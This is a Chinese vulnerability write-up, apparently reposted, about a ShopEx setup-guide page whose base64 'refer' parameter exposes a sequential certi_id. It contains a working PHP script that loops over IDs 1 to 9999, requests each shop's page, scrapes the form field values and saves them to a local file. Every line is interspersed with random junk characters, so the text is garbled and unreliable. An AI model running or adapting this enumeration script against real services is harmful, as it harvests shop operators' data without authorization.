|
|
简要描述:
! b+ ]+ {/ Y0 B9 wShopEx某接口缺陷,可遍历所有网站/ k' E* e) r2 F# B
详细说明:
5 Y0 E$ R+ N3 k \问题出现在shopex 网店使用向导页面 * r( _9 F" d% ~3 V& {2 e4 }) N: h% H
5 v; ^. \ ~3 q6 d( z' A+ {5 ]4 ^: e* D8 G
5 K9 p( V6 M, n+ k. Jhttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=) @% |2 Z4 S. L3 @ o$ w8 F: O7 G
/ l& {5 q& \5 ^' k* i+ M3 M
* n4 ]+ ]" v) ]" F- E, Y/ [/ [
9 L$ I+ y _" a3 H
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
4 b" {2 w) L/ S# V' I
7 Y1 b; T# r# K6 I: c" E7 W& n- \) i* I1 Y
! \/ n) Y) @. p0 b4 F6 I
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
~( P- S3 |& h% {
, Y/ ~8 P/ J4 h( q; \. w k$ Z* x" c
( j5 z; X; }$ F: a8 D, v- k( Z3 m T
<?php1 u! Q5 H. r: z3 y
) p: C3 n. A, W" A6 _) k for ($i=1; $i < 10000; $i++) { //遍历 y2 D4 h) E3 \- q8 D0 Y% M
- {& @3 d3 K0 E7 k) h9 \4 S
ShowshopExD($i);
" h6 c( K' f& N5 {1 q5 ]1 }6 X {
p* A/ Q- ]- e: {% y }( H+ h o5 k* R/ v5 ^% H
9 P/ ~9 ~/ t- }$ p4 q2 V! G7 O function ShowshopExD($cid) {% t4 w, m" |2 L1 Y/ r9 ^
2 o' f1 r4 _2 N $url='http://guide.ecos.shopex.cn/step2.php';
, u# A6 Z7 f, @9 B) q( J0 m8 x( F2 g. P2 @' s7 o
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');: H% A2 V) N8 J' P; {. i
- N1 j E" s4 I) Y+ M6 p
$url = $url.'?refer='.$refer;
3 o. ?- _* A# j7 ~
/ R* U: f2 K) ~/ J" N8 t, g $ch = curl_init($url);" ^. Y# {; _, K: |2 a$ w' F
, E O! r' j$ p/ t
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
# ^7 g% G1 d; p' g* V Y2 C- B3 t% _' P, P+ Z7 X8 P) Q( F
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
d6 E: s( y& q7 J# p1 g5 H7 t- K1 v$ F( l% b
$result = curl_exec($ch);9 N( ]7 H9 w+ |& Q& C
2 I5 U0 S- G% T3 q3 g# u $result = mb_convert_encoding($result, "gb2312", "UTF-8");" t; Z% Q9 O; b! j, ~
: p! V5 }5 G. G9 G0 N1 X! n if(strpos($result,$refer))
# _# d$ N; N+ m- V& q0 ]3 o; b, Z0 ]5 Y) n2 H6 s* c( Y
{8 ?$ n' g7 c6 S; X" b. c/ o$ z
. @4 }5 }% Z: o- E! l $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
$ H! H) J% {1 V/ F- M: E0 i( d9 e/ _6 a5 D8 d1 k. d4 D: O+ R+ s
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
/ s- [) ^; y7 ~/ E
! i2 u- N2 \- i' V. W' J; k foreach ($value[1] as $key) {
]/ E$ \8 `9 p; F& i
! x5 c/ _0 w( p7 m" H# N6 H# g preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
4 @/ p1 t! P! V# H' _
* v+ G6 Q) v; M: y9 m$ A" M4 ~ echo $res[1][0].':'.$res[3][0]."\r\n";
; H) U- I _ }% S# U2 M6 A3 d5 L) _1 o
$col =$res[1][0].':'.$res[3][0]."\r\n"; 0 c Y8 `1 k1 M) n$ ]0 } u
% u9 T; T( n5 Y# z# t2 R1 i7 _
fwrite($fp, $col, strlen($col)); & ~% I* C' e5 l$ t4 y1 r. n0 D
8 d5 J! e/ _% J7 m6 V }7 m. K4 g' \9 [8 ~
$ f& R4 d0 {4 L. C$ p1 x9 I' \5 ~' Z2 S
echo '--------------------------------'."\r\n";
' l3 J5 @$ S4 u( |9 N8 N( X7 G3 ?! u; z. C5 H5 w& y
fclose($fp); 2 j. e# N2 h+ B! k& H8 i5 q) v5 d
! B( Q" r, [( ?/ e' q& ]; o9 m4 d/ F
}
; k- ^; M# p% f# F
; v3 N! T' r1 |! F" h8 P# | flush();- N+ o$ L, a. A4 y$ s. }7 C6 F1 h: p
& i& d. B: c9 Z6 h
curl_close($ch);1 n9 j$ w J; F( L
7 E7 B( R# I. }- d1 I# }/ K
}
$ `* H" D0 h0 p& {$ o, X
' X# R1 L/ G o/ Q* y?>
! W+ }, B' f& e( h2 \5 G+ x漏洞证明:
, P+ W% M* N! @6 n: z- Ohttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg ~ O9 ~$ F7 | |+ d4 K# s) f
refer换成其他加密方式# [0 E& `! m5 z$ a
|
|